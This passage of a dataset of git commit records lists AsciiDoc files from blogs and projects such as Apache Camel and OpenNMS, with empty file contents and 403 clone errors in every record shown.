'https:\/\/github.com\/Vanilla-Java\/vanilla-java.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2bfed51338b6240ee03ad3f64bbd6538ab98af2e","subject":"Publish 1993-8-11-commoncommonfunctionphp-Hubpress-blog-usedcommonphp.adoc","message":"Publish 1993-8-11-commoncommonfunctionphp-Hubpress-blog-usedcommonphp.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"1993-8-11-commoncommonfunctionphp-Hubpress-blog-usedcommonphp.adoc","new_file":"1993-8-11-commoncommonfunctionphp-Hubpress-blog-usedcommonphp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e5fd1d6d2004654a7928de359cbeda615724ecaa","subject":"trex cons","message":"trex cons\n","repos":"dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core","old_file":"trex_console.asciidoc","new_file":"trex_console.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3ec90468c3ab65d60571d3b266479ba8d2f0313d","subject":"y2b create post I bet your pillow can't do this...","message":"y2b create post I bet your pillow can't do this...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-11-16-I-bet-your-pillow-cant-do-this.adoc","new_file":"_posts\/2016-11-16-I-bet-your-pillow-cant-do-this.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8f79d1281cbe9fac0322552e92bc9cd0b8b9ee3b","subject":"Update 2017-01-15-DES-MENSCHEN-ARBEIT-UND-GEWALT.adoc","message":"Update 2017-01-15-DES-MENSCHEN-ARBEIT-UND-GEWALT.adoc","repos":"backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io","old_file":"_posts\/2017-01-15-DES-MENSCHEN-ARBEIT-UND-GEWALT.adoc","new_file":"_posts\/2017-01-15-DES-MENSCHEN-ARBEIT-UND-GEWALT.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/backemulus\/backemulus.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"78fd9716273557c3adec1f85897cec1f87fc7280","subject":"Update 2017-03-25-Drop-handkerchief-with-M-E-M-E.adoc","message":"Update 2017-03-25-Drop-handkerchief-with-M-E-M-E.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-03-25-Drop-handkerchief-with-M-E-M-E.adoc","new_file":"_posts\/2017-03-25-Drop-handkerchief-with-M-E-M-E.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f86ed28a26cd714d21bc29530cb2dd17b4e75385","subject":"Update 2017-09-22-Visualizing-Installer-Workflow.adoc","message":"Update 2017-09-22-Visualizing-Installer-Workflow.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2017-09-22-Visualizing-Installer-Workflow.adoc","new_file":"_posts\/2017-09-22-Visualizing-Installer-Workflow.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e9f1f470ddd917963bde996f79be32f883125a47","subject":"Update 2017-11-08-api-blueprint.adoc","message":"Update 2017-11-08-api-blueprint.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-11-08-api-blueprint.adoc","new_file":"_posts\/2017-11-08-api-blueprint.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8daa9cb5072f83400f7d0ad8545a6a42f8ded825","subject":"Renamed '_posts\/2018-01-09-Blog-Home.adoc' to '_posts\/2018-01-09-Blog-And-Home.adoc'","message":"Renamed '_posts\/2018-01-09-Blog-Home.adoc' to '_posts\/2018-01-09-Blog-And-Home.adoc'","repos":"lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io","old_file":"_posts\/2018-01-09-Blog-And-Home.adoc","new_file":"_posts\/2018-01-09-Blog-And-Home.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lonelee-kirsi\/lonelee-kirsi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fb50e9620ebc71e0a362219a43ed58be7bbe3320","subject":"Update 2018-10-14-perspective-1.adoc","message":"Update 2018-10-14-perspective-1.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2018-10-14-perspective-1.adoc","new_file":"_posts\/2018-10-14-perspective-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5f9eb7a649b960c9ce920655abbab7eae91c2ccb","subject":"Update 2017-02-20-Lombok.adoc","message":"Update 2017-02-20-Lombok.adoc","repos":"ovo-6\/ovo-6.github.io,ovo-6\/ovo-6.github.io,ovo-6\/ovo-6.github.io,ovo-6\/ovo-6.github.io","old_file":"_posts\/2017-02-20-Lombok.adoc","new_file":"_posts\/2017-02-20-Lombok.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ovo-6\/ovo-6.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"11767ad16a79a01aa57177afb31d86e5f11b5c82","subject":"Avances","message":"Avances\n","repos":"isidorotrevino\/curso_pocgrails,isidorotrevino\/curso_pocgrails,isidorotrevino\/curso_pocgrails,isidorotrevino\/curso_pocgrails","old_file":"presentacion\/documentacion\/dia2.adoc","new_file":"presentacion\/documentacion\/dia2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/isidorotrevino\/curso_pocgrails.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2ad6b5b689046bb204bafa1ed60d60bccc6c1be0","subject":"Update 2016-03-18-Synchronizing-Living-Colors-gen2-and-Hue-bridge-20.adoc","message":"Update 2016-03-18-Synchronizing-Living-Colors-gen2-and-Hue-bridge-20.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-18-Synchronizing-Living-Colors-gen2-and-Hue-bridge-20.adoc","new_file":"_posts\/2016-03-18-Synchronizing-Living-Colors-gen2-and-Hue-bridge-20.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"269b22839fcaa551ba2542cfc294e2cdab1b6c15","subject":"Update 2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","message":"Update 2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_file":"_posts\/2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"76957d83313ecdba995ccb388f567a50e5139b84","subject":"Update 2015-10-18-Programatically-creating-Excel-reports-using-EPPlus.adoc","message":"Update 2015-10-18-Programatically-creating-Excel-reports-using-EPPlus.adoc","repos":"xmichaelx\/xmichaelx.github.io,xmichaelx\/xmichaelx.github.io","old_file":"_posts\/2015-10-18-Programatically-creating-Excel-reports-using-EPPlus.adoc","new_file":"_posts\/2015-10-18-Programatically-creating-Excel-reports-using-EPPlus.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xmichaelx\/xmichaelx.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"baf355eb99afd9e8281a6a83d0e84521b77ef3d4","subject":"Update 2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","message":"Update 2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","new_file":"_posts\/2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eec53acad98e67c76c2235630ea421ba2128d98b","subject":"Update 2016-03-29-Conocido-Desconocido.adoc","message":"Update 2016-03-29-Conocido-Desconocido.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-29-Conocido-Desconocido.adoc","new_file":"_posts\/2016-03-29-Conocido-Desconocido.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"800e28458e84e9f5eda49c8b4fdedf6b0a9afd15","subject":"Update 2017-05-19-Network-construction.adoc","message":"Update 2017-05-19-Network-construction.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-05-19-Network-construction.adoc","new_file":"_posts\/2017-05-19-Network-construction.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2bec9aebdaffe3e2f104cdd7d7757ccebbaace72","subject":"Update 2015-08-31-Un-Sensit-un-Rolling-Spider-et-Meteor-sont-dans-un-bateau.adoc","message":"Update 2015-08-31-Un-Sensit-un-Rolling-Spider-et-Meteor-sont-dans-un-bateau.adoc","repos":"anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog","old_file":"_posts\/2015-08-31-Un-Sensit-un-Rolling-Spider-et-Meteor-sont-dans-un-bateau.adoc","new_file":"_posts\/2015-08-31-Un-Sensit-un-Rolling-Spider-et-Meteor-sont-dans-un-bateau.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anthonny\/personal-blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9b7e754a7b131378d9a15a12a991bf63c335e56c","subject":"Update 2016-04-23-Its-Saturday.adoc","message":"Update 2016-04-23-Its-Saturday.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2016-04-23-Its-Saturday.adoc","new_file":"_posts\/2016-04-23-Its-Saturday.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5254f0485e6d925600cd84d0ada5a46f2967c575","subject":"Update 2016-03-20-Rhume-incessant-mal-de-gorge-recurrent-nez-bouche.adoc","message":"Update 2016-03-20-Rhume-incessant-mal-de-gorge-recurrent-nez-bouche.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-20-Rhume-incessant-mal-de-gorge-recurrent-nez-bouche.adoc","new_file":"_posts\/2016-03-20-Rhume-incessant-mal-de-gorge-recurrent-nez-bouche.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9958b155b3aca74a398ea248e77e6f4ad70b8bef","subject":"Update 2020-06-11-How-I-use-Meteor-Elm-Parcel-and-Tailwind-together.adoc","message":"Update 2020-06-11-How-I-use-Meteor-Elm-Parcel-and-Tailwind-together.adoc","repos":"anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog","old_file":"_posts\/2020-06-11-How-I-use-Meteor-Elm-Parcel-and-Tailwind-together.adoc","new_file":"_posts\/2020-06-11-How-I-use-Meteor-Elm-Parcel-and-Tailwind-together.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anthonny\/personal-blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4431f0adeb4af65b18b0025d349f9fb7231be8f4","subject":"Update 2016-03-18-Synchronizing-Living-Colors-gen2-remotes-Hue-and-bridge-20.adoc","message":"Update 2016-03-18-Synchronizing-Living-Colors-gen2-remotes-Hue-and-bridge-20.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-18-Synchronizing-Living-Colors-gen2-remotes-Hue-and-bridge-20.adoc","new_file":"_posts\/2016-03-18-Synchronizing-Living-Colors-gen2-remotes-Hue-and-bridge-20.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"24e322783039e413bec7849dde23d31e5b5b48b6","subject":"Update 2017-01-17-Persimmon-Rum-Porridge.adoc","message":"Update 2017-01-17-Persimmon-Rum-Porridge.adoc","repos":"zestyroxy\/zestyroxy.github.io,zestyroxy\/zestyroxy.github.io,zestyroxy\/zestyroxy.github.io,zestyroxy\/zestyroxy.github.io","old_file":"_posts\/2017-01-17-Persimmon-Rum-Porridge.adoc","new_file":"_posts\/2017-01-17-Persimmon-Rum-Porridge.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/zestyroxy\/zestyroxy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f3f983368d20ae5d2786ed937041b5d3e56fc7ed","subject":"Update 2016-04-03-etat-limite-personnalite-borderline.adoc","message":"Update 2016-04-03-etat-limite-personnalite-borderline.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-04-03-etat-limite-personnalite-borderline.adoc","new_file":"_posts\/2016-04-03-etat-limite-personnalite-borderline.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9689f853bb4baf50d9b9b1a30b22ca8efe69b0d4","subject":"Update 2016-03-02-Finding-Dory-characters-joining-Crush-at-Turtle-Talk-with-Crush-this-summer.adoc","message":"Update 2016-03-02-Finding-Dory-characters-joining-Crush-at-Turtle-Talk-with-Crush-this-summer.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2016-03-02-Finding-Dory-characters-joining-Crush-at-Turtle-Talk-with-Crush-this-summer.adoc","new_file":"_posts\/2016-03-02-Finding-Dory-characters-joining-Crush-at-Turtle-Talk-with-Crush-this-summer.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mouseguests\/mouseguests.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ed8210220b9f65d8c227bbf58cb4f01beb97d763","subject":"Update 2016-07-28-Potrzeba-matka-wynalazku.adoc","message":"Update 2016-07-28-Potrzeba-matka-wynalazku.adoc","repos":"pzmarzly\/pzmarzly.github.io,pzmarzly\/pzmarzly.github.io,pzmarzly\/g2zory,pzmarzly\/g2zory,pzmarzly\/pzmarzly.github.io,pzmarzly\/g2zory,pzmarzly\/pzmarzly.github.io,pzmarzly\/g2zory","old_file":"_posts\/2016-07-28-Potrzeba-matka-wynalazku.adoc","new_file":"_posts\/2016-07-28-Potrzeba-matka-wynalazku.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pzmarzly\/pzmarzly.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"815b8bc0faed077daf8c99a8571199b504bdcfbe","subject":"Update 2015-02-24-Second-Post.adoc","message":"Update 2015-02-24-Second-Post.adoc","repos":"RaoUmer\/hubpress.io,RaoUmer\/hubpress.io,RaoUmer\/hubpress.io","old_file":"_posts\/2015-02-24-Second-Post.adoc","new_file":"_posts\/2015-02-24-Second-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/RaoUmer\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bcd5c90680646b2bf8dd2225a6e769c8c62aaf14","subject":"Update 2016-10-07-Eureka-Server-DNS-based-peer-discovery-for-J-Hpster-Registry.adoc","message":"Update 2016-10-07-Eureka-Server-DNS-based-peer-discovery-for-J-Hpster-Registry.adoc","repos":"Brzhk\/Brzhk.github.io,Brzhk\/Brzhk.github.io,Brzhk\/Brzhk.github.io,Brzhk\/Brzhk.github.io","old_file":"_posts\/2016-10-07-Eureka-Server-DNS-based-peer-discovery-for-J-Hpster-Registry.adoc","new_file":"_posts\/2016-10-07-Eureka-Server-DNS-based-peer-discovery-for-J-Hpster-Registry.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Brzhk\/Brzhk.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b5fdc6a43cb8da2491ffd693a1dfe54a8a4f113a","subject":"Update 2018-10-21-.adoc","message":"Update 2018-10-21-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-10-21-.adoc","new_file":"_posts\/2018-10-21-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"45781689f6a0f096ee4b303ebc5279c45fb03d03","subject":"Update 2016-03-01-git.adoc","message":"Update 2016-03-01-git.adoc","repos":"chbailly\/chbailly.github.io,chbailly\/chbailly.github.io,chbailly\/chbailly.github.io,chbailly\/chbailly.github.io","old_file":"_posts\/2016-03-01-git.adoc","new_file":"_posts\/2016-03-01-git.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/chbailly\/chbailly.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"18d7157897aa45189f90efb896c7d07c1a62ae24","subject":"Update 2017-10-15-Git.adoc","message":"Update 2017-10-15-Git.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-10-15-Git.adoc","new_file":"_posts\/2017-10-15-Git.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5f4bcc13dc51a79c4b30da3efcb114a033fe6823","subject":"Fix for Bug NMS-8194 - Part VII","message":"Fix for Bug NMS-8194 - Part VII\n\nAdding documentation for the rules about the HTTP return codes used on\nthe ReST API.\n","repos":"aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms","old_file":"opennms-doc\/guide-development\/src\/asciidoc\/text\/rest\/rest-api.adoc","new_file":"opennms-doc\/guide-development\/src\/asciidoc\/text\/rest\/rest-api.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/aihua\/opennms.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"002dc74b9a11cffae911314177115eb364e45c4b","subject":"Added Gzip Dataformat docs to Gitbook","message":"Added Gzip Dataformat docs to Gitbook\n","repos":"akhettar\/camel,bhaveshdt\/camel,yuruki\/camel,neoramon\/camel,jamesnetherton\/camel,hqstevenson\/camel,jkorab\/camel,salikjan\/camel,DariusX\/camel,tdiesler\/camel,nboukhed\/camel,chirino\/camel,hqstevenson\/camel,sverkera\/camel,scranton\/camel,isavin\/camel,davidkarlsen\/camel,anton-k11\/camel,w4tson\/camel,drsquidop\/camel,bhaveshdt\/camel,gnodet\/camel,curso007\/camel,zregvart\/camel,w4tson\/camel,JYBESSON\/camel,adessaigne\/camel,JYBESSON\/camel,Fabryprog\/camel,apache\/camel,anoordover\/camel,tlehoux\/camel,pax95\/camel,davidkarlsen\/camel,gilfernandes\/camel,drsquidop\/camel,veithen\/camel,jkorab\/camel,w4tson\/camel,pmoerenhout\/camel,anton-k11\/camel,hqstevenson\/camel,lburgazzoli\/camel,mgyongyosi\/camel,gilfernandes\/camel,snurmine\/camel,bgaudaen\/camel,tdiesler\/camel,scranton\/camel,mcollovati\/camel,nikhilvibhav\/camel,JYBESSON\/camel,chirino\/camel,RohanHart\/camel,dmvolod\/camel,veithen\/camel,pkletsko\/camel,gilfernandes\/camel,bhaveshdt\/camel,nikhilvibhav\/camel,NickCis\/camel,christophd\/camel,JYBESSON\/camel,apache\/camel,driseley\/camel,mgyongyosi\/camel,punkhorn\/camel-upstream,ssharma\/camel,akhettar\/camel,allancth\/camel,anoordover\/camel,snurmine\/camel,apache\/camel,kevinearls\/camel,jamesnetherton\/camel,Thopap\/camel,akhettar\/camel,onders86\/camel,jkorab\/camel,pax95\/camel,acartapanis\/camel,jonmcewen\/camel,jamesnetherton\/camel,scranton\/camel,gautric\/camel,CodeSmell\/camel,allancth\/camel,lburgazzoli\/apache-camel,objectiser\/camel,dmvolod\/camel,adessaigne\/camel,mcollovati\/camel,scranton\/camel,tlehoux\/camel,jamesnetherton\/camel,snurmine\/camel,gilfernandes\/camel,sabre1041\/camel,hqstevenson\/camel,jonmcewen\/camel,w4tson\/camel,nboukhed\/camel,sabre1041\/camel,prashant2402\/camel,jarst\/camel,bgaudaen\/camel,sabre1041\/camel,yuruki\/camel,Thopap\/camel,lburgazzoli\/camel,pax95\/camel,curso007\/camel,acartapanis\/camel,anoordover\/camel,akhettar\/camel,cunningt\/camel,sverkera\/camel,jarst\/camel,tadayosi\/camel,davidkarlsen\/camel,sverkera\/camel,chirino\/camel,gnodet\/camel,sverkera\/camel,isavin\/camel,alvinkwekel\/camel,onders86\/camel,punkhorn\/camel-upstream,mgyongyosi\/camel,drsquidop\/camel,bgaudaen\/camel,onders86\/camel,nboukhed\/camel,christophd\/camel,anoordover\/camel,lburgazzoli\/apache-camel,pkletsko\/camel,nicolaferraro\/camel,objectiser\/camel,ullgren\/camel,curso007\/camel,bhaveshdt\/camel,davidkarlsen\/camel,tkopczynski\/camel,chirino\/camel,sabre1041\/camel,tlehoux\/camel,pax95\/camel,mgyongyosi\/camel,DariusX\/camel,isavin\/camel,tlehoux\/camel,kevinearls\/camel,punkhorn\/camel-upstream,nicolaferraro\/camel,RohanHart\/camel,allancth\/camel,cunningt\/camel,alvinkwekel\/camel,salikjan\/camel,akhettar\/camel,RohanHart\/camel,tadayosi\/camel,cunningt\/camel,nboukhed\/camel,alvinkwekel\/camel,DariusX\/camel,sirlatrom\/camel,snurmine\/camel,lburgazzoli\/apache-camel,onders86\/camel,pkletsko\/camel,Thopap\/camel,NickCis\/camel,onders86\/camel,objectiser\/camel,pmoerenhout\/camel,tkopczynski\/camel,nikhilvibhav\/camel,prashant2402\/camel,anoordover\/camel,driseley\/camel,anton-k11\/camel,akhettar\/camel,driseley\/camel,driseley\/camel,nicolaferraro\/camel,pkletsko\/camel,lburgazzoli\/camel,acartapanis\/camel,driseley\/camel,JYBESSON\/camel,CodeSmell\/camel,neoramon\/camel,yuruki\/camel,jonmcewen\/camel,snurmine\/camel,w4tson\/camel,Fabryprog\/camel,nicolaferraro\/camel,christophd\/camel,dmvolod\/camel,allancth\/camel,rmarting\/camel,ssharma\/camel,jkorab\/camel,zregvart\/camel,lburgazzoli\/camel,Fabryprog\/camel,ullgren\/camel,NickCis\/camel,tdiesler\/camel,gautric\/camel,gilfernandes\/camel,allancth\/camel,neoramon\/camel,ssharma\/camel,acartapanis\/camel,tadayosi\/camel,bgaudaen\/camel,tkopczynski\/camel,NickCis\/camel,adessaigne\/camel,isavin\/camel,mgyongyosi\/camel,punkhorn\/camel-upstream,gautric\/camel,RohanHart\/camel,prashant2402\/camel,ullgren\/camel,tkopczynski\/camel,sirlatrom\/camel,prashant2402\/camel,ssharma\/camel,cunningt\/camel,veithen\/camel,NickCis\/camel,ssharma\/camel,CodeSmell\/camel,dmvolod\/camel,acartapanis\/camel,Fabryprog\/camel,tlehoux\/camel,gilfernandes\/camel,pkletsko\/camel,onders86\/camel,snurmine\/camel,objectiser\/camel,bgaudaen\/camel,jamesnetherton\/camel,dmvolod\/camel,jarst\/camel,acartapanis\/camel,w4tson\/camel,isavin\/camel,rmarting\/camel,jonmcewen\/camel,ullgren\/camel,yuruki\/camel,lburgazzoli\/apache-camel,sabre1041\/camel,rmarting\/camel,JYBESSON\/camel,pkletsko\/camel,tadayosi\/camel,apache\/camel,pmoerenhout\/camel,kevinearls\/camel,christophd\/camel,jamesnetherton\/camel,drsquidop\/camel,scranton\/camel,jarst\/camel,tadayosi\/camel,gnodet\/camel,kevinearls\/camel,anoordover\/camel,Thopap\/camel,sverkera\/camel,gnodet\/camel,dmvolod\/camel,sabre1041\/camel,jonmcewen\/camel,lburgazzoli\/camel,tlehoux\/camel,anton-k11\/camel,cunningt\/camel,pmoerenhout\/camel,chirino\/camel,zregvart\/camel,neoramon\/camel,tdiesler\/camel,RohanHart\/camel,christophd\/camel,bgaudaen\/camel,gautric\/camel,pax95\/camel,chirino\/camel,kevinearls\/camel,sirlatrom\/camel,pmoerenhout\/camel,jkorab\/camel,lburgazzoli\/camel,adessaigne\/camel,jkorab\/camel,driseley\/camel,neoramon\/camel,bhaveshdt\/camel,kevinearls\/camel,gautric\/camel,alvinkwekel\/camel,jarst\/camel,nboukhed\/camel,apache\/camel,apache\/camel,gnodet\/camel,curso007\/camel,hqstevenson\/camel,nboukhed\/camel,bhaveshdt\/camel,jonmcewen\/camel,anton-k11\/camel,sirlatrom\/camel,CodeSmell\/camel,veithen\/camel,sirlatrom\/camel,tdiesler\/camel,NickCis\/camel,tkopczynski\/camel,mcollovati\/camel,yuruki\/camel,tadayosi\/camel,anton-k11\/camel,lburgazzoli\/apache-camel,Thopap\/camel,cunningt\/camel,drsquidop\/camel,jarst\/camel,adessaigne\/camel,zregvart\/camel,adessaigne\/camel,isavin\/camel,allancth\/camel,curso007\/camel,ssharma\/camel,RohanHart\/camel,gautric\/camel,drsquidop\/camel,rmarting\/camel,mcollovati\/camel,veithen\/camel,christophd\/camel,pmoerenhout\/camel,Thopap\/camel,sverkera\/camel,rmarting\/camel,DariusX\/camel,nikhilvibhav\/camel,tkopczynski\/camel,lburgazzoli\/apache-camel,scranton\/camel,pax95\/camel,mgyongyosi\/camel,sirlatrom\/camel,rmarting\/camel,prashant2402\/camel,ve